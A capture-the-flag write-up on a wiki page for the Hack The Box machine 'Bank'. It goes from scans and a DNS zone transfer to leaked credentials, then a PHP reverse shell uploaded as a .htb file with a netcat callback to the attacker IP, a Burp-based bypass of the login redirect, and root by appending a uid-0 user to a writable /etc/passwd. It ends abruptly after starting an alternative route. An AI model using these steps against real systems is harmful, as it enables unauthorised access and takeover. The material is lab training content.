Bank

From Luniwiki
Jump to: navigation, search

Back

Bank01.png

Port scans

root@kali:~/HTB/Machines/Bank# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.29 --rate=1000
Starting masscan 1.0.5 at 2019-11-18 04:54:03 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.29
Discovered open port 53/udp on 10.10.10.29
Discovered open port 80/tcp on 10.10.10.29
Discovered open port 53/tcp on 10.10.10.29

Nmap

root@kali:~/HTB/Machines/Bank# nmap -A -T4 -v 10.10.10.29
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-17 23:54 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Initiating Ping Scan at 23:54
Scanning 10.10.10.29 [4 ports]
Completed Ping Scan at 23:54, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:54
Scanning bank.htb (10.10.10.29) [1000 ports]
Discovered open port 53/tcp on 10.10.10.29
Discovered open port 80/tcp on 10.10.10.29
Discovered open port 22/tcp on 10.10.10.29
Completed SYN Stealth Scan at 23:54, 0.62s elapsed (1000 total ports)
Initiating Service scan at 23:54
Scanning 3 services on bank.htb (10.10.10.29)
Completed Service scan at 23:54, 6.09s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against bank.htb (10.10.10.29)
adjust_timeouts2: packet supposedly had rtt of -341735 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341735 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341224 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341224 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341479 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341479 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341542 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -341542 microseconds.  Ignoring time.
Retrying OS detection (try #2) against bank.htb (10.10.10.29)
adjust_timeouts2: packet supposedly had rtt of -644605 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -644605 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -743682 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -743682 microseconds.  Ignoring time.
Initiating Traceroute at 23:54
Completed Traceroute at 23:54, 0.05s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 23:54
Completed Parallel DNS resolution of 2 hosts. at 23:54, 0.19s elapsed
NSE: Script scanning 10.10.10.29.
Initiating NSE at 23:54
Completed NSE at 23:54, 8.24s elapsed
Initiating NSE at 23:54
Completed NSE at 23:54, 0.16s elapsed
Initiating NSE at 23:54
Completed NSE at 23:54, 0.00s elapsed
Nmap scan report for bank.htb (10.10.10.29)
Host is up (0.038s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-title: HTB Bank - Login
|_Requested resource was login.php
Aggressive OS guesses: Linux 3.13 (94%), Linux 3.2 - 4.9 (94%), Linux 3.16 (93%), Linux 3.18 (93%), Linux 4.2 (93%), Linux 4.8 (93%), Linux 4.9 (93%), Crestron XPanel control system (93%), ASUS RT-N56U WAP (Linux 3.4) (92%), Linux 3.12 (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 199.637 days (since Thu May  2 09:36:43 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp) HOP RTT ADDRESS 1 37.42 ms 10.10.14.1 2 37.55 ms bank.htb (10.10.10.29)
NSE: Script Post-scanning. Initiating NSE at 23:54 Completed NSE at 23:54, 0.00s elapsed Initiating NSE at 23:54 Completed NSE at 23:54, 0.00s elapsed Initiating NSE at 23:54 Completed NSE at 23:54, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.00 seconds Raw packets sent: 1115 (54.068KB) | Rcvd: 2543 (103.658KB)

Vulnerabilies scan

root@kali:~/HTB/Machines/Bank# nmap -p 22,53,80 --script vuln 10.10.10.29
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-17 23:56 EST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for bank.htb (10.10.10.29)
Host is up (0.037s latency).

PORT STATE SERVICE 22/tcp open ssh |_clamav-exec: ERROR: Script execution failed (use -d to debug) 53/tcp open domain |_clamav-exec: ERROR: Script execution failed (use -d to debug) 80/tcp open http |_clamav-exec: ERROR: Script execution failed (use -d to debug) | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=bank.htb | Found the following possible CSRF vulnerabilities: | | Path: http://bank.htb:80/ | Form id: |_ Form action: |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /login.php: Possible admin folder |_ /inc/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Nmap done: 1 IP address (1 host up) scanned in 345.44 seconds

The vulnerability seems to be a denegation of service, so not usable.

DNS enumeration

root@kali:~/HTB/Machines/Bank# dig @10.10.10.29 axfr bank.htb
; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> @10.10.10.29 axfr bank.htb
; (1 server found)
;; global options: +cmd
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
bank.htb.               604800  IN      NS      ns.bank.htb.
bank.htb.               604800  IN      A       10.10.10.29
ns.bank.htb.            604800  IN      A       10.10.10.29
www.bank.htb.           604800  IN      CNAME   bank.htb.
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
;; Query time: 38 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Mon Nov 18 00:36:13 EST 2019
;; XFR size: 6 records (messages 1, bytes 171)

The zone transfer is allowed, and the administrator email (chris@bank.htb) has been filled. It seems a good hint.And teh web page is hosted at bank.htb.

Web enumeration

The web page at http://bank.htb shows a login page.

Bank03.png

And Wappalyzer shows PHP technology.

Bank02.png

root@kali:~/HTB/Machines/Bank# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "php,txt" -f -t 1000 -u http://bank.htb

_|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| )
Extensions: php, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-18_11-41-22.log
Target: http://bank.htb
[11:41:22] Starting: [11:41:24] 403 - 281B - /icons/ [11:41:25] 302 - 3KB - /support.php -> login.php [11:41:25] 403 - 283B - /uploads/ [11:41:25] 302 - 7KB - /index.php -> login.php [11:41:25] 403 - 279B - /.php [11:41:26] 200 - 2KB - /login.php [11:41:27] 200 - 2KB - /assets/ [11:41:33] 302 - 0B - /logout.php -> index.php [11:41:42] 200 - 1KB - /inc/ [11:54:25] 403 - 289B - /server-status/ [12:07:52] 200 - 248KB - /balance-transfer/
Task Completed

The enumeration gets several php pages. and an interesting folder balance-transfer. A second point is: pages index.php and support.php redirect to login.php, but the sizes are too big for a simple redirection (7kB and 3kB).

Web page analyze

index.php

root@kali:~# curl -v http://bank.htb/index.php
*   Trying 10.10.10.29:80...
* TCP_NODELAY set
* Connected to bank.htb (10.10.10.29) port 80 (#0)
> GET /index.php HTTP/1.1
> Host: bank.htb
> User-Agent: curl/7.66.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 22 Nov 2019 01:27:50 GMT
< Server: Apache/2.4.7 (Ubuntu)
< X-Powered-By: PHP/5.5.9-1ubuntu4.21
* Added cookie HTBBankAuth="q4m77li6rp2gq91so2a0mhf1i2" for domain bank.htb, path /, expire 0
< Set-Cookie: HTBBankAuth=q4m77li6rp2gq91so2a0mhf1i2; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< location: login.php
< Content-Length: 7322
< Content-Type: text/html
<
<div class="col-md-10">
 <br>
     <div class="row">
         <div class="col-lg-3 col-md-6">
             <div class="panel panel-primary">
                 <div class="panel-heading">
                     <div class="row">
                         <div class="col-xs-3">
                             <i class="fa fa-usd fa-5x"></i>
                         </div>
                         <div class="col-xs-9 text-right">
                             <div style="font-size: 30px;"> $</div>
                             <div>Balance</div>
                         </div>
                     </div>
                 </div>
             </div>
         </div>
         <div class="col-lg-3 col-md-6">
             <div class="panel panel-yellow">
                 <div class="panel-heading">
                     <div class="row">
                         <div class="col-xs-3">
                             <i class="fa fa-shopping-cart fa-5x"></i>
                         </div>
                         <div class="col-xs-9 text-right">
                             <div style="font-size: 30px;">8</div>
                             <div>Total Transactions</div>
                         </div>
                     </div>
                 </div>
             </div>
         </div>
         <div class="col-lg-3 col-md-6">
             <div class="panel panel-green">
                 <div class="panel-heading">
                     <div class="row">
                         <div class="col-xs-3">
                             <i class="fa fa-credit-card fa-5x"></i>
                         </div>
                         <div class="col-xs-9 text-right">
                             <div style="font-size: 30px;">0</div>
                             <div>Total CreditCards</div>
                         </div>
                     </div>
                 </div>
             </div>
         </div>
         <div class="col-lg-3 col-md-6">
             <div class="panel panel-red">
                 <div class="panel-heading">
                     <div class="row">
                         <div class="col-xs-3">
                             <i class="fa fa-support fa-5x"></i>
                         </div>
                         <div class="col-xs-9 text-right">
                             <div style="font-size: 30px;">0</div>
                             <div>Support Tickets</div>
                         </div>
                     </div>
                 </div>
             </div>
         </div>
     </div>
     <!-- /.row -->
     <div class="">
         <div class="panel panel-default">
             <div class="panel-heading">
                 <h3 style="font-size: 20px;"><i class="fa fa-credit-card fa-fw"></i> CreditCard Information</h3>
             </div>
             <div class="panel-body">
                 <div class="table-responsive">
                     <table class="table table-bordered table-hover table-striped">
                         <thead>
                             <tr>
                                 <th>Card Type</th>
                                 <th>Card Number</th>
                                 <th>Card Exp Date</th>
                                 <th>CVV</th>
                                 <th>Balance</th>
                             </tr>
                         </thead>
                         <tbody>
                                                     </tbody>
                     </table>
                 </div>
             </div>
         </div>
     </div>
     <div class="">
         <div class="panel panel-default">
             <div class="panel-heading">
                 <h3 style="font-size: 20px;"><i class="fa fa-money fa-fw"></i> Transaction History</h3>
             </div>
             <div class="panel-body">
                 <div class="table-responsive">
                     <table class="table table-bordered table-hover table-striped">
                         <thead>
                             <tr>
                                 <th>Transaction ID</th>
                                 <th>Transaction Date</th>
                                 <th>Transaction Time</th>
                                 <th>Amount (USD)</th>
                             </tr>
                         </thead>
                         <tbody>
                             <tr>
                                 <td>3326</td>
                                 <td>10/21/2016</td>
                                 <td>3:29 PM</td>
                                 <td>$321.33</td>
                             </tr>
                             <tr>
                                 <td>3325</td>
                                 <td>10/21/2016</td>
                                 <td>3:20 PM</td>
                                 <td>$234.34</td>
                             </tr>
                             <tr>
                                 <td>3324</td>
                                 <td>10/21/2016</td>
                                 <td>3:03 PM</td>
                                 <td>$724.17</td>
                             </tr>
                             <tr>
                                 <td>3323</td>
                                 <td>10/21/2016</td>
                                 <td>3:00 PM</td>
                                 <td>$23.71</td>
                             </tr>
                             <tr>
                                 <td>3322</td>
                                 <td>10/21/2016</td>
                                 <td>2:49 PM</td>
                                 <td>$8345.23</td>
                             </tr>
                             <tr>
                                 <td>3321</td>
                                 <td>10/21/2016</td>
                                 <td>2:23 PM</td>
                                 <td>$245.12</td>
                             </tr>
                             <tr>
                                 <td>3320</td>
                                 <td>10/21/2016</td>
                                 <td>2:15 PM</td>
                                 <td>$5663.54</td>
                             </tr>
                             <tr>
                                 <td>3319</td>
                                 <td>10/21/2016</td>
                                 <td>2:13 PM</td>
                                 <td>$943.45</td>
                             </tr>
                         </tbody>
                     </table>
                 </div>
             </div>
         </div>
     </div>
 <!-- /.row -->
 </div>
 <br>
 </div>
 <!-- /.container-fluid -->
         </div>
         <!-- /#page-wrapper -->
 <br>
     </div>
     <!-- /#wrapper -->
 <br>
     <!-- jQuery -->
     <script src="./assets/js/jquery.js"></script>
 <br>
     <!-- Bootstrap Core JavaScript -->
     <script src="./assets/js/bootstrap.min.js"></script>
 <br>
     <!-- Morris Charts JavaScript -->
     <script src="./assets/js/plugins/morris/raphael.min.js"></script>
     <script src="./assets/js/plugins/morris/morris.min.js"></script>
     <script src="./assets/js/plugins/morris/morris-data.js"></script>
 <br>
     <!-- SweetAlert -->
     <script src="./assets/js/sweetalert.min.js"></script>
 <br>
 </body>
 <br>
 </html>
 * Connection #0 to host bank.htb left intact

The header 302 redirect to login.php, but index.php deliver content before the redirect. This is a vulnerability, because we can see information from the application.

support.php

root@kali:~# curl -v http://bank.htb/support.php
*   Trying 10.10.10.29:80...
* TCP_NODELAY set
* Connected to bank.htb (10.10.10.29) port 80 (#0)
> GET /support.php HTTP/1.1
> Host: bank.htb
> User-Agent: curl/7.66.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 22 Nov 2019 01:31:04 GMT
< Server: Apache/2.4.7 (Ubuntu)
< X-Powered-By: PHP/5.5.9-1ubuntu4.21
* Added cookie HTBBankAuth="afsdndhrkur5j9mpginc2se6t1" for domain bank.htb, path /, expire 0
< Set-Cookie: HTBBankAuth=afsdndhrkur5j9mpginc2se6t1; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< location: login.php
< Content-Length: 3291
< Content-Type: text/html
<
<br>
 <div class="col-sm-5">
     <div class="panel panel-primary">
         <div class="panel-heading">
             <h3 style="font-size: 20px;">My Tickets</h3>
         </div>
         <div class="panel-body">
                     <div class="content-box-large">
                         <div class="panel-body">
                             <table class="table table-bordered">
                                 <thead>
                                     <tr>
                                         <th>#</th>
                                         <th>Title</th>
                                         <th>Message</th>
                                         <th>Attachment</th>
                                         <th>Actions</th>
                                     </tr>
                                 </thead>
                                 <tbody>
                                                                 </tbody>
                             </table>
                         </div>
                     </div>
                 </div>
     </div>
 </div>
 <!-- New Ticket -->
 <div class="col-sm-5">
     <section class="panel">
 <br>
         <div class="panel-body">
             <form class="new_ticket" id="new_ticket" accept-charset="UTF-8" method="post" enctype="multipart/form-data">
 <br>
                 <label>Title</label>
                 <input required placeholder="Title" class="form-control" type="text" name="title" id="ticket_title" style="background-repeat: repeat; background-image: none; background-position: 0% 0%;">
                 <br>
 <br>
                 <label>Message</label>
                 <textarea required placeholder="Tell us your problem" class="form-control" style="height: 170px; background-repeat: repeat; background-image: none; background-position: 0% 0%;" name="message" id="ticket_message"></textarea>
                 <br>
                 <div style="position:relative;">
                                <!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->
                                        <a class='btn btn-primary' href='javascript:;'>
                                             Choose File...
                                             <input type="file" required style='position:absolute;z-index:2;top:0;left:0;filter: alpha(opacity=0);-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";opacity:0;background-color:transparent;color:transparent;' name="fileToUpload" size="40"  onchange='$("#upload-file-info").html($(this).val().replace("C:\\fakepath\\", ""));'>
                                         </a>
                                          
                                         <span class='label label-info' id="upload-file-info"></span>
                                 </div>
                                 <br>
                 <button name="submitadd" type="submit" class="btn btn-primary mt20" data-disable-with="<div class="loading-o" style="padding: 7px 21px;"></div>">Submit</button>
             </form>
 <br>
         </div>
 <br>
     </section>
 <br>
 </div>
 <br>
         </div>
         <!-- /#page-wrapper -->
 <br>
     </div>
     <!-- /#wrapper -->
 <br>
     <!-- jQuery -->
     <script src="./assets/js/jquery.js"></script>
 <br>
     <!-- Bootstrap Core JavaScript -->
     <script src="./assets/js/bootstrap.min.js"></script>
 <br>
     <!-- Morris Charts JavaScript -->
     <script src="./assets/js/plugins/morris/raphael.min.js"></script>
     <script src="./assets/js/plugins/morris/morris.min.js"></script>
     <script src="./assets/js/plugins/morris/morris-data.js"></script>
 <br>
     <!-- SweetAlert -->
     <script src="./assets/js/sweetalert.min.js"></script>
 <br>
 </body>
 <br>
 </html>
 * Connection #0 to host bank.htb left intact

Again, the content is sent with the redirect. In this case there is a form that allows to upload files. And more important, the comment indicates that files with extension htb are executed.

Folder balance-transfer

Bank10.png

There are a bunch of files, but the content is encrypted.

Bank11.png

Download of files from balance-transfer

root@kali:~/HTB/Machines/Bank/balance-transfer# wget -r http://bank.htb/balance-transfer/
root@kali:~/HTB/Machines/Bank/balance-transfer# cd bank.htb/balance-transfer/
root@kali:~/HTB/Machines/Bank/balance-transfer/bank.htb/balance-transfer# ls -l *.acc | wc -l
999

There is a thousand files. Find something uninteresting is like to search a needle in an haystack. But I remembered the email from the DNS enumeration, adn bingo

root@kali:~/HTB/Machines/Bank/balance-transfer/bank.htb/balance-transfer# grep chris@bank.htb *.acc
68576f20e9732f1b2edc4df5b8533230.acc:Email: chris@bank.htb
root@kali:~/HTB/Machines/Bank/balance-transfer/bank.htb/balance-transfer# cat 68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount=== Full Name: Christos Christopoulos Email: chris@bank.htb Password: !##HTBB4nkP4ssw0rd!## CreditCards: 5 Transactions: 39 Balance: 8842803 .

Access to the application

With the user and password, we can login into the application.

Bank04.png

The support page allows file upload.

Bank05.png

Creation of php reverse shell

root@kali:~/HTB/Machines/Bank# cp /usr/share/webshells/php/php-reverse-shell.php ./
Update the parameters of the reverse shell
root@kali:~/HTB/Machines/Bank# grep CHANGE php-reverse-shell.php
$ip = '10.10.14.34';  // CHANGE THIS
$port = 4444;       // CHANGE THIS

Run listener

root@kali:~/HTB/Machines/Bank# rlwrap nc -nvlp 4444

Upload file to support page

Bank06.png

Bank07.png

But the upload fails.

Rename of rs with htb extension

Because of the comment on the support page, I renamed the file with htb extension.

<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->

Bank08.png

And this time it works, the file is uploaded.

Bank09.png

Open the reverse shell

root@kali:~/HTB/Machines/Bank# curl http://bank.htb/uploads/php-reverse-shell.htb

And on the listener

root@kali:~/HTB/Machines/Bank# rlwrap nc -nvlp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.29.
Ncat: Connection from 10.10.10.29:34304.
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 04:52:21 up  2:12,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@bank:/$ <CTRL Z>
[1]+  Stopped                 rlwrap nc -nvlp 4444
root@kali:~/HTB/Machines/Bank# stty rows 24 columns 134
root@kali:~/HTB/Machines/Bank# stty raw -echo
root@kali:~/HTB/Machines/Bank# fg rlwrap nc -nvlp 4444
www-data@bank:/$ export TERM=screen
export TERM=screen

Alternative way to gain the reverse shell without the user and password

As told before, the web application send the html code and the redirect. We can use this coding mistake to upload a file with the page support without authentication.

Setup Burp suite

Bank12.png

We want to filter the interceptions from and for the machine bank.htb, and we want to intercept responses too.

Access the form

Send the request for the page support.php

Bank13.png

When the response come back, we see that the server responds 302 (redirect) and the header location redirects to the page login.php

Bank14.png

The response is modified to send to the browser a response 200 OK and removing the location header.

Bank15.png

The form appears on the browser.

Bank16.png

Upload the file

Fill the form with rs file and submit it.

Bank17.png

Forward the request.

Bank18.png

Modify the response as 200 OK, and without location header.

Bank19.png

The file is uploaded to the server.

Bank20.png

Start the listener

root@kali:~/HTB/Machines/Bank# rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Open the reverse shell

Bank21.png And the reverse shell is opened.

root@kali:~/HTB/Machines/Bank# rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.29.
Ncat: Connection from 10.10.10.29:34114.
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 06:13:32 up 22 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@bank:/$ <CTRL Z>
[1]+  Stopped                 rlwrap nc -nvlp 4444
root@kali:~/HTB/Machines/Bank# stty rows 24 columns 134
root@kali:~/HTB/Machines/Bank# stty raw -echo
root@kali:~/HTB/Machines/Bank# fg rlwrap nc -nvlp 4444
www-data@bank:/$ export TERM=screen
export TERM=screen

User flag

www-data@bank:/$ cat /home/chris/user.txt
cat /home/chris/user.txt
<USER_FLAG>

User escalation

Download the script LinEnum.sh

root@kali:~/HTB/Machines/Bank# wget -q https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

To upload the file to the server, I start a local web server.

root@kali:~/HTB/Machines/Bank# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

And the script is downloaded to the victim.

www-data@bank:/$ cd /tmp
cd /tmp
www-data@bank:/tmp$ wget http://10.10.14.34/LinEnum.sh
wget http://10.10.14.34/LinEnum.sh
--2019-11-18 17:35:36--  http://10.10.14.34/LinEnum.sh
Connecting to 10.10.14.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46108 (45K) [text/x-sh]
Saving to: 'LinEnum.sh'

100%[======================================>] 46,108 --.-K/s in 0.09
2019-11-18 17:35:36 (494 KB/s) - 'LinEnum.sh' saved [46108/46108] www-data@bank:/tmp$ chmod +x LinEnum.sh chmod +x LinEnum.sh

Run enumeration script

www-data@bank:/tmp$ ./LinEnum.sh -r linenum -e /tmp/ -t

I upload the report to my machine to read it easily.

www-data@bank:/tmp$ scp -r linenum-18-11-19 LinEnum-export-18-11-19/ root@10.10.14.34:/root/HTB/Machines/Bank/linenum/

Useful information from the linux enumeration

DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"

uid=1000(chris) gid=1000(chris) groups=1000(chris),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
The file /var/www/bank/bankreports.txt
[-] Are permissions on /home directories lax: total 12K drwxr-xr-x 3 root root 4.0K May 28 2017 . drwxr-xr-x 22 root root 4.0K Dec 24 2017 .. drwxr-xr-x 3 chris chris 4.0K Jun 14 2017 chris
[-] Files not owned by user but writable by group: -rw-rw-rw- 1 root root 1252 May 28 2017 /etc/passwd
[-] Root is allowed to login via SSH: PermitRootLogin yes
[-] MYSQL version: mysql Ver 14.14 Distrib 5.5.55, for debian-linux-gnu (i686) using readline 6.3
[-] Apache version: Server version: Apache/2.4.7 (Ubuntu) Server built: May 9 2017 16:13:38
[-] Can we read/write sensitive files: -rw-rw-rw- 1 root root 1252 May 28 2017 /etc/passwd -rw-r--r-- 1 root root 707 May 28 2017 /etc/group -rw-r--r-- 1 root root 665 Feb 20 2014 /etc/profile -rw-r----- 1 root shadow 895 Jun 14 2017 /etc/shadow
[-] SUID files: -rwsr-xr-x 1 root root 112204 Jun 14 2017 /var/htb/bin/emergency

File /var/www/bank/bankreports.txt

I missed it, because I didn't add the extension txt to my web enumation :(, in this file, the user and password were in clear too.

root@kali:~/HTB/Machines/Bank# curl bank.htb/bankreports.txt
+=================+
| HTB Bank Report |
+=================+

===Users=== Full Name: Christos Christopoulos Email: chris@bank.htb Password: !##HTBB4nkP4ssw0rd!## CreditCards: 2 Transactions: 8 Balance: 1.337$

Permissions on /home directories are lax

As we already have seen, we do not need to escalate the user to capture the user flag.

/etc/passwd is writable

We can escalate privilege easily with this way.

/var/htb/bin/emergency

This file can be executed with root, and seems interesting.

www-data@bank:/tmp$ file /var/htb/bin/emergency
file /var/htb/bin/emergency
/var/htb/bin/emergency: setuid ELF 32-bit LSB  shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=1fff1896e5f8db5be4db7b7ebab6ee176129b399, stripped

This file could search suid files manually.

www-data@bank:/tmp$ find / -perm -4000 -exec ls -l {} \; 2>/dev/null
find / -perm -4000 -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 112204 Jun 14  2017 /var/htb/bin/emergency
-rwsr-xr-x 1 root root 5480 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 492972 Aug 11  2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 333952 Dec  7  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9808 Nov 24  2015 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 daemon daemon 46652 Oct 21  2013 /usr/bin/at
-rwsr-xr-x 1 root root 35916 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45420 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 44620 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 18168 Nov 24  2015 /usr/bin/pkexec
-rwsr-xr-x 1 root root 30984 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 18136 May  8  2014 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 66284 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 156708 May 29  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 72860 Oct 21  2013 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 17996 Nov 24  2016 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 323000 Apr 21  2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 38932 May  8  2014 /bin/ping
-rwsr-xr-x 1 root root 43316 May  8  2014 /bin/ping6
-rwsr-xr-x 1 root root 35300 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 30112 May 15  2015 /bin/fusermount
-rwsr-xr-x 1 root root 88752 Nov 24  2016 /bin/mount
-rwsr-xr-x 1 root root 67704 Nov 24  2016 /bin/umount

Root Flag

/etc/passwd

www-data@bank:/tmp$ echo "root2:`openssl passwd hello`:0:0:root:/root:/bin/bash" >> /etc/passwd
>> /etc/passwdenssl passwd hello`:0:0:root:/root:/bin/bash"

A new line for user root2 is created with password hello.

root@kali:~/HTB/Machines/Bank# ssh root2@bank.htb
The authenticity of host 'bank.htb (10.10.10.29)' can't be established.
ECDSA key fingerprint is SHA256:FzRjUWEJH7r9hunMHbWe5kA2nfM0lnrdGyDQQ9uXg68.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'bank.htb' (ECDSA) to the list of known hosts.
root2@bank.htb's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-79-generic i686)

System information as of Fri Nov 22 02:39:54 EET 2019
System load: 0.16 Memory usage: 4% Processes: 84 Usage of /: 7.4% of 28.42GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at: https://landscape.canonical.com/ Your Hardware Enablement Stack (HWE) is supported until April 2019. Last login: Fri Jun 16 07:44:56 2017 root@bank:~# whoami root root@bank:~# cat /root/root.txt <ROOT FLAG>

/var/htb/bin/emergency

This alternative way is to use the emergency program found before.

www-data@bank:/tmp$ whoami
whoami
